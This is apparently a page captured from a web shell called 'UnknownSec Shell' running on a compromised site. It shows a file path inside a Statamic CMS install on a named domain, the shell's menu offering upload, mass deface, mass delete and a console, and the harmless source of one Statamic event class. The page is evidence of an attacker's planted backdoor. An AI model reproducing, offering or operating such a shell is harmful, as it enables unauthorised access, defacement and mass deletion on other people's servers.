shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Events
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
AssetReferencesUpdated.php
<?php namespace Statamic\Events; use Statamic\Contracts\Git\ProvidesCommitMessage; class AssetReferencesUpdated extends Event implements ProvidesCommitMessage { public $asset; public function __construct($asset) { $this->asset = $asset; } public function commitMessage() { return __('Asset references updated', [], config('statamic.git.locale')); } }
© 2026 UnknownSec